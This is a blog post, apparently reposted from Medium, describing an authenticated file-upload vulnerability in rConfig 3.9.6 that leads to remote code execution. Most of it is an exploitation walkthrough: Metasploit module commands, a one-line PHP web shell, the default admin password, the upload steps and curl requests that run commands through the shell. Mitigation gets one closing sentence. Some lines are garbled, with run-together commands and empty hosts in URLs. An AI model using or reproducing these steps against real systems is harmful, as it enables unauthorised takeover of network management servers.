rConfig 3.9.6 is a version of the network configuration management tool rConfig, which is prone to multiple vulnerabilities. One of these vulnerabilities is an arbitrary file upload issue that can lead to remote code execution (RCE) for authenticated users, specifically affecting versions 3.9.6 and below.
This vulnerability exists in the /lib/crud/vendors.crud.php file, where the vendor logo functionality does not validate the contents of uploaded files, allowing an authenticated user to upload arbitrary PHP code.246 Once uploaded, the attacker can trigger the execution of the uploaded code by requesting the file in the /images/vendor path.246
Another vulnerability in rConfig 3.9.6 is a local file inclusion issue, which is tracked as CVE-2021–29006.
Metasploit exploit :
msf > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
Set the necessary options:
msf exploit(rconfig_vendors_auth_file_upload_rce) > show optionsmsf exploit(rconfig_vendors_auth_file_upload_rce) > set RHOSTmsf exploit(rconfig_vendors_auth_file_upload_rce) > set USERNAMEmsf exploit(rconfig_vendors_auth_file_upload_rce) > set PASSWORDExecute the exploit:
msf exploit(rconfig_vendors_auth_file_upload_rce) > exploitManual exploit :
Step 1: Prepare the Malicious PHP File
system($_GET['cmd']);?>Step 2: Authenticate to the rConfig Web Interface
Default pass admin
Step 3: Upload the Malicious PHP File
Once logged in, navigate to the Vendors section and click on Add Vendor. https://target_ip/vendors.php
In the Add Vendor form, fill in the required fields, and in the Vendor Logo field, select the shell.php file you created earlier.
Submit the form to upload the file.
Step 4: Determine the File Path
The uploaded file will be stored in the /images/vendor directory. You need to determine the exact file path.
You can do this by inspecting the HTML source code of the Vendors page or by using a tool like Burp Suite to intercept the HTTP requests.
Look for the request that uploads the file and check the filename parameter. The file path will be in the format /images/vendor/ .
Step 5: Execute the Malicious PHP File
Now that you have the file path, you can execute the malicious PHP file by sending a GET request to the file’s URL.
For example, if the file path is /images/vendor/shell.php, you can execute it by navigating to http:// /images/vendor/shell.php in your web browser.
You can also use a tool like curl to execute the file:
curl http:///images/vendor/shell.php?cmd=whoamiThis will execute the whoami command on the target system and display the output.
Step 6: Interact with the Web Shell
Once you’ve executed the malicious PHP file, you can interact with the web shell by sending GET requests with the cmd parameter.
curl http:///images/vendor/shell.php?cmd=lsTo mitigate these risks, it is recommended to update to a more recent version of rConfig or apply security patches if available.
This post was originally published on Medium. Imported 2025-02-12.